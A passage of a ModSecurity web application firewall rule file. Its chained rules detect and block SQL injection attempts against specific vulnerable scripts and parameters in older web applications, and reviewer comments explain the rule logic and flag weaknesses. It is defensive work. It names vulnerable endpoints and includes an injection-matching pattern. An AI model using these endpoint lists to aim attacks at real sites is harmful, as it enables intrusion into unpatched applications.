"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007093,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- types.asp TYPE_ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:TYPE_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- types.asp TYPE_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007099) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- homeDetail.asp AD_ID UPDATE SecRule REQUEST_LINE "@contains /homeDetail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007099,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- homeDetail.asp AD_ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:AD_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- homeDetail.asp AD_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007105) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp cat UPDATE SecRule REQUEST_LINE "@contains /result.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007105,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007111) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp compare UPDATE SecRule REQUEST_LINE "@contains /compareHomes.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007111,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp compare UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:compare/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp compare UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007117) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp clear UPDATE SecRule REQUEST_LINE "@contains /compareHomes.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007117,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp clear UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:clear/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp clear UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007123) SpiderLabs Research (SLR) Public Vulns: ET 
WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp adID UPDATE SecRule REQUEST_LINE "@contains /compareHomes.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007123,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp adID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:adID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- compareHomes.asp adID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007129) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp aminprice UPDATE SecRule REQUEST_LINE "@contains /result.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007129,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp aminprice UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:aminprice/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp aminprice UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007135) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp amaxprice UPDATE SecRule REQUEST_LINE "@contains /result.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007135,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt 
-- result.asp amaxprice UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:amaxprice/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp amaxprice UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007141) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp abedrooms UPDATE SecRule REQUEST_LINE "@contains /result.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007141,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp abedrooms UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:abedrooms/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp abedrooms UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005261) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthusiast SQL Injection Attempt -- show_owned.php cat UPDATE SecRule REQUEST_LINE "@contains /show_owned.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005261,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthusiast SQL Injection Attempt -- show_owned.php cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22180'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthusiast SQL Injection Attempt -- show_owned.php cat 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005267) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthusiast SQL Injection Attempt -- show_joined.php cat UPDATE SecRule REQUEST_LINE "@contains /show_joined.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005267,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthusiast SQL Injection Attempt -- show_joined.php cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22180'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthusiast SQL Injection Attempt -- show_joined.php cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006224) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Eric GUILLAUME uploader&downloader SQL Injection Attempt -- administre2.php id_user UPDATE SecRule REQUEST_LINE "@contains /administration/administre2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006224,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Eric GUILLAUME uploader&downloader SQL Injection Attempt -- administre2.php id_user UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2945'" SecRule &TX:'/SQL_INJECTION.*ARGS:id_user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Eric GUILLAUME uploader&downloader SQL Injection Attempt -- administre2.php id_user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005882) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS E-SMARTCART SQL Injection Attempt -- productdetail.asp product_id UPDATE SecRule 
REQUEST_LINE "@contains /productdetail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005882,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS E-SMARTCART SQL Injection Attempt -- productdetail.asp product_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3074'" SecRule &TX:'/SQL_INJECTION.*ARGS:product_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS E-SMARTCART SQL Injection Attempt -- productdetail.asp product_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005341) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e-Vision CMS SQL Injection Attempt -- style.php template UPDATE SecRule REQUEST_LINE "@contains /style.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005341,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS e-Vision CMS SQL Injection Attempt -- style.php template UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4054'" SecRule &TX:'/SQL_INJECTION.*ARGS:template/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e-Vision CMS SQL Injection Attempt -- style.php template UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007065) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Evolve shopping cart SQL Injection Attempt -- products.asp partno UPDATE SecRule REQUEST_LINE "@contains /products.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007065,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Evolve shopping cart SQL Injection Attempt -- products.asp partno UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21323'" SecRule 
&TX:'/SQL_INJECTION.*ARGS:partno/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Evolve shopping cart SQL Injection Attempt -- products.asp partno UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
#
# How each SLR rule pair below works (two-link chain, phase 2):
#   Link 1 matches when REQUEST_LINE, after urlDecodeUni, htmlEntityDecode and
#   normalisePathWin, contains the script path; it carries the id, msg, tags
#   and the "block" action.
#   Link 2 is the confirming condition. In most pairs it counts (&) TX
#   variables whose name matches a regex and needs at least one; in 2006344 it
#   is a regex over QUERY_STRING and REQUEST_BODY instead. When both links
#   match, audit-log part E is added, tx.anomaly_score is raised by
#   tx.critical_anomaly_score and the match is recorded under a
#   rule-id-prefixed WEB_ATTACK/SQL_INJECTION key.
# NOTE(review): the TX-counting form only sees variables that already exist,
#   so it presumably relies on generic SQL injection rules having run earlier
#   in phase 2 -- confirm the include order.
# NOTE(review): no t:lowercase is applied and the path literals keep mixed case
#   (e.g. /vdateUsr.asp), so link 1 compares them exactly as written --
#   confirm that matches how the protected server resolves script names.
#
# (2005086) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ExoPHPDesk SQL Injection Attempt -- faq.php id UPDATE
# NOTE(review): the name regex stops at "ARGS:id" with no end anchor, so it
#   also matches TX keys recorded for parameters whose names only begin with
#   "id". The alert then names "id" even if another parameter was flagged.
#   Anchoring the end of the name would narrow it; run the regression tests
#   before changing the pattern.
SecRule REQUEST_LINE "@contains /faq.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005086,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ExoPHPDesk SQL Injection Attempt -- faq.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3234'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ExoPHPDesk SQL Injection Attempt -- faq.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2006818) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Expinion.net iNews SQL Injection Attempt -- articles.asp ex UPDATE
# NOTE(review): the reference tag on link 1 reads "bid/2.2.8". That is not a
#   numeric Bugtraq ID like the other securityfocus tags in this file; it
#   equals the release number of this rule set, so it looks as if a
#   version-string substitution overwrote the original number. The tag is
#   metadata only and does not affect matching, but it is what an analyst
#   follows from an alert -- restore the numeric ID from the upstream
#   signature (it cannot be recovered from this file).
# NOTE(review): "ARGS:ex" is also unanchored at the end and matches TX keys for
#   any parameter whose name begins with "ex".
SecRule REQUEST_LINE "@contains /articles.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006818,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Expinion.net iNews SQL Injection Attempt -- articles.asp ex UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/2.2.8'"
SecRule &TX:'/SQL_INJECTION.*ARGS:ex/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Expinion.net iNews SQL Injection Attempt -- articles.asp ex UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2006344) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EzHRS HR Assist SQL Injection Attempt -- vdateUsr.asp UPDATE
# Link 2 here is a case-insensitive regex over QUERY_STRING and REQUEST_BODY,
# not a TX-variable count, so it does not depend on an earlier rule.
# NOTE(review): "UPDATE.+SET" has no word boundaries, so any text containing
#   "update" followed later by "set" satisfies it; consider \b anchors if this
#   produces false positives. Link 2 lists no t: actions, so its
#   transformations presumably come from SecDefaultAction -- confirm.
SecRule REQUEST_LINE "@contains /vdateUsr.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006344,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS EzHRS HR Assist SQL Injection Attempt -- vdateUsr.asp UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23304'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EzHRS HR Assist SQL Injection Attempt -- vdateUsr.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2005620) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UPDATE
# The path literal includes the /boxx/ directory, so link 1 is scoped to that
# location. "ARGS:iid" has no end anchor either (see the note on 2005086).
SecRule REQUEST_LINE "@contains /boxx/ShowAppendix.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005620,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/456699/100/0/threaded'"
SecRule &TX:'/SQL_INJECTION.*ARGS:iid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2003851) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FAQEngine SQL Injection Attempt -- question.php questionref UPDATE SecRule REQUEST_LINE "@contains /question.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003851,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS FAQEngine SQL Injection Attempt -- question.php questionref 
UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3943'" SecRule &TX:'/SQL_INJECTION.*ARGS:questionref/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FAQEngine SQL Injection Attempt -- question.php questionref UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006128) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mxmania File Upload Manager (FUM) SQL Injection Attempt -- detail.asp ID UPDATE SecRule REQUEST_LINE "@contains /detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006128,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Mxmania File Upload Manager (FUM) SQL Injection Attempt -- detail.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2997'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mxmania File Upload Manager (FUM) SQL Injection Attempt -- detail.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006332) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fantastic News SQL Injection Attempt -- news.php id UPDATE SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006332,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Fantastic News SQL Injection Attempt -- news.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2906'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fantastic News SQL Injection Attempt -- news.php id 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003793) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FileRun SQL Injection Attempt -- index.php fid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003793,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS FileRun SQL Injection Attempt -- index.php fid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23752'" SecRule &TX:'/SQL_INJECTION.*ARGS:fid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FileRun SQL Injection Attempt -- index.php fid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006903) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FipsSHOP SQL Injection Attempt -- index.asp cat UPDATE SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006903,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS FipsSHOP SQL Injection Attempt -- index.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21289'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FipsSHOP SQL Injection Attempt -- index.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006909) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FipsSHOP SQL Injection Attempt -- index.asp did UPDATE SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006909,rev:6,msg:'SLR: 
ET WEB_SPECIFIC_APPS FipsSHOP SQL Injection Attempt -- index.asp did UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21289'" SecRule &TX:'/SQL_INJECTION.*ARGS:did/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FipsSHOP SQL Injection Attempt -- index.asp did UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007187) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- filelist.asp show_id UPDATE SecRule REQUEST_LINE "@contains /filelist.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007187,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- filelist.asp show_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21282'" SecRule &TX:'/SQL_INJECTION.*ARGS:show_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- filelist.asp show_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007193) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- filelist.asp parentid UPDATE SecRule REQUEST_LINE "@contains /filelist.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007193,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- filelist.asp parentid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21282'" SecRule &TX:'/SQL_INJECTION.*ARGS:parentid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- 
filelist.asp parentid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007199) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- showfile.asp fid UPDATE SecRule REQUEST_LINE "@contains /showfile.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007199,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- showfile.asp fid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21282'" SecRule &TX:'/SQL_INJECTION.*ARGS:fid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fixit iDMS Pro Image Gallery SQL Injection Attempt -- showfile.asp fid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003828) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flashgames SQL Injection Attempt -- game.php lid UPDATE SecRule REQUEST_LINE "@contains /game.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003828,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Flashgames SQL Injection Attempt -- game.php lid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3849'" SecRule &TX:'/SQL_INJECTION.*ARGS:lid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flashgames SQL Injection Attempt -- game.php lid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005151) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Forum Livre SQL Injection Attempt -- info_user.asp user UPDATE SecRule 